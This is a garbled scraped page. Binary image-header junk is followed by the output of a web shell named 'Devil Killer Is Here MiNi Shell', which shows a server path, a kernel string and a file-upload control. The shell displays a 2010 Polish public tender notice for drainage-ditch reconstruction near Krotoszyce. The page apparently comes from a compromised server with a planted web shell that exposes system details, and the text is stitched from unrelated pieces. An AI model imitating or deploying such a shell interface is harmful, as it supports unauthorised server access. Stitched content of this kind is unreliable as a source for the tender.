JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100521/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100521/131251-N-2010.html

<p class="kh_header"><b>Wrocław: Operacje z zakresu odbudowy koryt cieków realizowane w ramach PROW 2007-2013
Krajów - melioracje szczegółowe gm. Krotoszyce</b><br>
<b>Numer ogłoszenia: 131251 - 2010; data zamieszczenia: 21.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dolnośląski Zarząd Melioracji i Urządzeń Wodnych we Wrocławiu , al. J. Matejki 5, 50-333 Wrocław, woj. dolnośląskie, tel. 071 3226681 do 83, faks 071 3227929.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dzmiuw.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa samorządu terytorialnego wo.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Operacje z zakresu odbudowy koryt cieków realizowane w ramach PROW 2007-2013
Krajów - melioracje szczegółowe gm. Krotoszyce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Odbudowa rowów melioracyjnych, L=2075,7m, w tym:
     - rów D-1, L=529,5m
     - rów D-1-1, L=157,9m
     - rów D-2, L=115,1m
     - rów D-2-1, L=61,5m
     - rów D-3, L=366,2m
     - rów D-3-1, L=93,0m
     - rów D-4, L=498,0m
     - rów D-4-1, L=254,5m
2. Odbudowa istniejących rowów melioracyjnych, L=648,9m, w tym:
     - rów R-D-1, L=387,6m
     - rów R-D-2, L=261,3m
     - rów otwarty, L=93,1m
     - rurociąg dren. D śr. Dn 272 mm, L=168,2m
3. Udrożnienie odcinków rowów, L=207,4m
4. Rozbiórka istniejących budowli:
     - przejazd śr. 600 mm L=8,0 betonowy - rów R-D-1
     - przejazd śr. 600 mm L=6,0 betonowy - rów R-D-1
     - przejazd śr. 600 mm L=6,0 betonowy - rów R-D-1
5. Budowa obiektów nowych lub przebudowa istniejących:
     - przejazdy melioracyjne dokowe śr. 600 mm, L=8,0-9,5 m - 7 szt.
     - przejazdy melioracyjne darniowe śr. 600 mm, L=9,5 m - 4 szt.
     - wylot dokowy żelbet. rurociągu - 1 szt.
6. Roboty ziemne - odbudowa koryt rowów melioracyjnych:
     - wykopy, V=4389,4 m3
     - nasypy, V=2290,8 m3
     - powierzchnia skarp wykopów i nasypów, F=10064,6 m2
     - dodatkowe wykopy pod umocnienia, V=40,8 m3
     - plantowanie skarp, F=10064,6 m2
     - rozplantowanie, V=2139,2 m3
     - zdjęcie warstwy ziemi urodzajnej grub. 20 cm, F=47331 m2
7. Kategorie gruntów: 
     - kat. III - 70%
     - kat. IV - 30%
8. Technologia wykonywania robót ziemnych:
     - wykopy wykonywane mechanicznie - 80%
     - wykopy wykonywane ręcznie - 20%
     - pozostałe roboty ziemne wykonywane mechanicznie - 90%
     - pozostałe roboty ziemne wykonywane ręcznie - 10%
9. Umocnienia koryt rowów melioracyjnych:
     - humusowanie skarp ziemią urodzajną warstwą grub. 5 cm, V=503,2 m3
     - obsiew skarp mieszanką traw, F=10064,6 m2
     - lokalnie zabezpieczenie narzutem kamiennym, V=40,8 m3
10. Ścinanie i karczowanie krzaków i zagajników w obrębie robót: - gęste F=450 m2
11. Uporządkowanie gruntów w pasie zajęcia: - grunty orne, F=3,75 ha

Część II
1. Odbudowa rowów melioracyjnych, L=8106,1m, w tym:
     - rów R-A, L=861,80m
     - rów R-A-1, L=682,90m
     - rów R-A-2, L=448,00m
     - rów R-D, L=2021,60m
     - rów R-D-5, L=227,80m
     - rów R-D-6, L=371,30m
     - rów R-D-7, L=1352,60m
     - rów R-D-8, L=198,40m
     - rów R-D-9, L=495,50m
     - rów R-D-10, L=124,60m
     - rów R-C-5, L=254,50m
     - rów R-C-1, L=903,30m
     - rów R-C-9, L=163,80m
2. Udrożnienie odcinków rowów i rowów bocznych, L=433m
3. Rozbiórka istniejących budowli:
     - przepust o 600 mm L=6,6 m kamienny - rów R-A-1
     - przepust o 600 mm L=7,0 m betonowy - rów R-A-1
     - przepust o 600 mm L=4,4 m betonowy - rów R-A-2
     - przepust o 500 mm L=4,3 m betonowy - rów R-A-2
     - przepust o 600 mm L=5,2 m betonowy - rów R-D
     - przepust o 600 mm L=4,2 m betonowy - rów R-D
     - przepust o 500 mm L=5,0 m betonowy - rów R-D
     - przepust o 500 mm L=3,8 m betonowy - rów R-D
     - przepust o 300 mm L=6,6 m ceglany - rów R-D-5
     - przepust o 600 mm L=5,3 m betonowy - rów R-D-7
     - umocnienie koryta rowu R-D-7 z płyt bet. w km 0+466¸0+600, L=134m
     - przepust o 600 mm L=6,8 m betonowy - rów R-D-8
     - umocnienie koryta rowu R-D-10 z płyt bet. w km 0+000¸0+125, L=125m
     - przepust o 500 mm L=5,7 m betonowy - rów R-C-1
4. Budowa obiektów nowych lub przebudowa istniejących: przejazdy melioracyjne dokowe 600 mm,  
       L=8,0 m z możliwością  piętrzenia wód na rowach, 13 szt.
5. Budowa obiektów przy drogach DBGiTR (dostosowanie do potrzeb): przejazdy melioracyjne  
       dokowe 600 mm, L=8,0 m z możliwością  piętrzenia wód na poszczególnych rowach, 9 szt.
6. Odbudowa istniejących wylotów drenarskich, w tym:
     - śr. 10 cm, szt. 2
     - śr. 15 cm, szt. 5
7. Roboty ziemne - odbudowa koryt rowów melioracyjnych:
     - wykopy, V=13753,9 m3
     - nasypy, V=345,2 m3
     - powierzchnia skarp wykopów, F=41831,2 m2
     - powierzchnia plantowania terenu nasypów, F=1031,9 m2
     - dodatkowe wykopy pod umocnienia, V=257,4 m3
     - plantowanie skarp, F=41831,2 m2
     - rozplantowanie, V=13666,1 m3
     - zdjęcie warstwy ziemi urodzajnej grub. 20 cm, F=119825 m2
8. Kategorie gruntów: 
     - kat. III - 70%
     - kat. IV - 30%
9. Technologia wykonywania robót ziemnych:
     - wykonywane mechanicznie - 70%
     - wykonywane ręcznie - 30%
     - tereny leśne i zadrzewione - 100% ręcznie
10. Umocnienia koryt rowów melioracyjnych:
     - humusowanie skarp ziemią urodzajną warstwą grub. 5 cm, V=2091,6 m3
     - obsiew skarp mieszanką traw, F=41831 m2
     - lokalnie zabezpieczenie dna koryt rowów narzutem kamiennym warstwą grub. 15 cm 
       (rowy: R-A-2, R-D, R-D-7, R-D-9, R-D-10, R-C-1, R-C-9), V=254,7 m3
11. Ścinanie drzew w obrębie robót: 274 szt.
     - średnica 10-15cm, 120 szt.
     - średnica 16-25cm, 86 szt.
     - średnica 26-35cm, 43 szt.
     - średnica 36-45cm, 12 szt.
     - średnica 46-55cm, 6 szt.
     - średnica 56-65cm, 3 szt.
     - średnica 66-75cm, 1 szt.
     - średnica 86-95cm, 2 szt.
     - średnica 96-105cm, 1 szt.
12. Karczowanie pni drzew w obrębie robót: 188 szt.
     - średnica 10-15cm, 72 szt.
     - średnica 16-25cm, 55 szt.
     - średnica 26-35cm, 36 szt.
     - średnica 36-45cm, 11 szt.
     - średnica 46-55cm, 6 szt.
     - średnica 56-65cm, 3 szt.
     - średnica 66-75cm, 2 szt.
     - średnica 86-95cm, 2 szt.
     - średnica 96-105cm, 1 szt.
13. Ścinanie i karczowanie krzaków i zagajników w obrębie robót: 5807 m2
     - zakrzaczenia gęste, F=2345 m2 
     - zakrzaczenia średniej gęstości, F=1537 m2
     - zakrzaczenia rzadkie, F=135 m2
14. Zagospodarowanie gruntów w pasie zajęcia:
     - użytki zielone (łaki, pastwiska), F=1,29 ha
     - grunty orne, F=10,69 ha


Szczegółowy zakres robót zawiera załączony przedmiar robót (wchodzący w skład dokumentacji projektowej) 
Przedmiot zamówienia ma być wykonany zgodnie z dokumentacją projektową oraz specyfikacją techniczną wykonania i odbioru robót budowlanych wraz z przedmiarem robót..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości: 50.000,00 zł.
(słownie:  pięćdziesiąt tysięcy i 00/100 złotych).

Miejsce i sposób wniesienia wadium.
BZ WBK S.A.I O/Legnica 23 1090 2066 0000 0005 4200 0365  
Termin wniesienia wadium.
Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium 
w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew do godz.: 10.00  dnia 28.06.2010 r. 

Wadium w formie niepieniężnej powinno być wniesione w formie oryginału za pokwitowaniem do kasy Zamawiającego w Legnicy w budynku przy ul. Rataja 32 za pośrednictwem Działu Księgowości do terminu wyznaczonego na składanie ofert czyli do godz. 10.00 dnia 28.06.2010 r</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku. Zamawiający uzna warunek za spełniony o ile wykonawca posiada pozytywne i udokumentowane doświadczenie w wykonawstwie zadań podobnych do będącego przedmiotem przetargu, tj. wymienionych w Polskiej Klasyfikacji Obiektów Budowlanych i Klasyfikacji Środka Trwałego - grupa 2, podgrupa 22, rodzaj 225, 226 (Rozporządzenie Rady Ministrów z 30.12.1999 r. w sprawie PKOB,  Dz. U. nr 112 z 1999 r., poz. 1316 ze zmianami oraz w sprawie KŚT, Dz. U. nr 112 z 1999 r., poz. 1317 ze zmianami), tj. wykonali (decyduje data odbioru końcowego) w okresie ostatnich 5 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie co najmniej:
 1 obiekt o długości min 10 km w tym odwodnienie użytków rolnych na powierzchni min. 50 ha, odpowiadający swoim rodzajem, i rozmiarem modernizacji, odbudowy lub budowy cieków melioracji podstawowych, szczegółowych 
 lub
 2 obiekty o łącznej długości co najmniej 10 km w tym 1 obiekt z zakresu odwodnienia użytków rolnych na powierzchni min. 50 ha  odpowiadające swoim rodzajem, i rozmiarem modernizacji, odbudowy lub budowy cieków melioracji podstawowych, szczegółowych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku. Zamawiający uzna warunek za spełniony o ile Wykonawca zatrudnia lub dysponuje osobą uprawnioną do pełnienia funkcji kierownika budowy w zakresie wykonania przedmiotu zamówienia posiadającego uprawnienia do kierowania robotami związanymi z obiektami budowlanymi gospodarki wodnej i melioracji wodnych,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku. Zamawiający uzna warunek za spełniony o ile wykonawca posiada przerób roczny w każdym z ostatnich trzech latach (2007, 2008, 2009) w sprzedaży r.b.m netto,  - o wartości nie mniejszej niż podana w ofercie całkowita cena; oraz posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż  500 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Strony przewidują możliwość dokonywania zmian postanowień umowy w stosunku do treści oferty,
na podstawie której dokonano wyboru Wykonawcy w każdym przypadku, gdy konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub gdy te zmiany warunkują należyte wykonanie przedmiotu umowy.
2.	Zmiany o których mowa w pkt 1 mogą dotyczyć w szczególności:
1)	zakresu przedmiotu umowy, jeżeli konieczność wprowadzenia takiej zmiany jest skutkiem zmiany przepisów prawa lub okoliczności faktycznych ujawnionych po dacie zawarcia umowy;
2)	terminu wykonania przedmiotu umowy przypadku:
a)	jeżeli wykonanie zamówienia dodatkowego (robót dodatkowych) lub robót zamiennych wpłynie na termin wykonania zamówienia podstawowego, 
b)	wystąpienia okoliczności uniemożliwiających realizację robót we wcześniej ustalonych terminach powodujących konieczność aktualizacji harmonogramu rzeczowo-finansowego lub zmianę terminu wykonania przedmiotu umowy, między innymi:
	konieczność wprowadzenia istotnych zmian w dokumentacji projektowej lub w specyfikacji technicznej wykonania i odbioru robót;
	wstrzymanie robót przez Zamawiającego;
	inne spowodowane obiektywnymi zdarzeniami niezależnymi od woli Stron; 
c)	wystąpienia okoliczności niezależnych od Wykonawcy, w tym wynikających z tzw. -siły wyższej- uniemożliwiających realizację robót. Wstrzymanie robót z tego powodu musi być potwierdzone w dzienniku budowy i zaakceptowane przez inspektora nadzoru. Wstrzymanie robót budowlanych ze względu na warunki atmosferyczne typowe (właściwe) dla danej pory roku i miesiąca, lub zła organizacja robót nie uzasadniają zmiany terminu umowy.
3)	zmiany zakresu przedmiotu umowy oraz zmiany wynagrodzenia (ceny) pod warunkiem zmiany w planie finansowym właściwego organu (warunek dotyczy przypadku zwiększenia wynagrodzenia):
a)	jeżeli dla należytego wykonania zamówienia konieczne będzie wykonanie robót zamiennych lub zaniechanie części robót;
b)	jeżeli nastąpi ograniczenie zakresu rzeczowego przedmiotu umowy lub brak środków finansowych;
c)	zmiany stawki podatku VAT; 
4)	konieczności wykonania robót budowlanych przy zastosowaniu innych rozwiązań niż wskazane w dokumentacji technicznej i ofercie, w sytuacji gdyby zastosowanie przewidzianych rozwiązań groziło nie wykonaniem lub wadliwym wykonaniem robót.
3.	W innych przypadkach określonych w niniejszej umowie.
